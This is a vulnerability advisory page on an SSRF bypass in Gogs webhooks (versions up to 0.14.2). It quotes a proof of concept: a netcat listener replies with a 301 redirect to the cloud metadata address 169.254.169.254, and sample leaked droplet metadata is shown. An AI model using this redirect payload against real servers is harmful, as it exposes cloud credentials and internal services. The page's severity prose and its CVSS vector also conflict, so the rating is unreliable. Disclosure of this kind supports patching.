Severity by source
AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
Webhook creation needs an authenticated privileged account (PR:L); SSRF to cloud metadata changes scope (S:C) and can expose high-value internal secrets (C:H), with limited integrity and no direct availability impact.
Primary rating from Vendor (https://github.com/gogs/gogs).
CVSS VectorVendor: https://github.com/gogs/gogs
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
Lifecycle Timeline
6DescriptionCVE.org
Summary
The fix for CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs.
This was already communicated in the initial report but it looks like there was a bit of a miscommunication.
Details
By creating a webook pointing to any URL that will return the following:
HTTP/1.1 301 Moved Permanently
Location: http://169.254.169.254/metadata/v1.json
Content-Length: 0
Connection: closeIt is possible to access 169.254.169.254
PoC
- Run netcat on any server
- Use this server as the webhook URL
- Once you get the request from the webhook (for example by testing it), copy the response above
Results from running this on try.gogs:
{"droplet_id":456901166,"hostname":"gogs-do-nyc3-01","vendor_data":"Content-Type: multipart/mixed; boundary=\"===============8645434374073493512==\"\nMIME-Version: 1.0\n\n--===============8645434374073493512==\nMIME-Version: 1.0\nContent-Type: text/cloud-config; charset=\"us-ascii\"\nContent-Transfer-Encoding: 7bit\nContent-Disposition: attachment; filename=\"cloud-config\"\n\n#cloud-config\n\n
# Enable root and password auth\ndisable_roo...{"dhcp_enabled":false,"vpc_peering_enabled":false},"dotty_status":"running","ssh_info":{"port":22}}Impact
Server Side Request Forgery
Fix
The "simplest way" to fix it is most likely to leverage Client.CheckRedirect https://pkg.go.dev/net/http#hdr-Clients_and_Transports to check if the redirect is pointing to a blocked hostname
AnalysisAI
Server-side request forgery in Gogs (self-hosted Git service) versions ≤ 0.14.2 lets a user who can configure a webhook reach internal-only network addresses by abusing HTTP redirect following. The original CVE-2022-1285 fix only blocked webhook URLs whose hostname resolves into local CIDRs, but the delivery client still chased 3xx redirects, so a webhook pointed at an attacker-controlled host that returns a 301 to http://169.254.169.254/ pivots into cloud metadata and other internal services. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Requires the ability to create or test a webhook in Gogs ≤ 0.14.2 (typically a repository-admin authenticated account) and an attacker-controlled HTTP endpoint that returns a 3xx redirect to an internal address such as http://169.254.169.254/. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The provided CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L, 8.3 High) reflects network reachability, low complexity, scope change (the SSRF lets the app act against other systems), and limited C/I/A. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An authenticated Gogs user with webhook-configuration rights sets a webhook to an attacker-controlled external host and triggers a test delivery; that host responds with HTTP 301 redirecting to http://169.254.169.254/metadata/v1.json, which the pre-0.14.3 client follows, returning cloud-instance metadata (e.g., DigitalOcean droplet config) to the attacker. With low attack complexity (AC:L) and a documented PoC, the attacker can harvest internal service responses or cloud credentials and pivot further into the environment. |
| Remediation | Upgrade to the vendor-released patch: Gogs 0.14.3, which adds an http.Client.CheckRedirect policy that refuses to follow webhook redirects (PR #8263 / commit 199cf4fd5bbe40b92f6dc8d649e241fd7a8d0018; advisory GHSA-c4v7-xg93-qf8g). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
24 hours: Identify all Gogs instances running versions ≤0.14.2; immediately restrict webhook configuration permissions to system administrators only and disable webhooks if not operationally required. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-39064
GHSA-c4v7-xg93-qf8g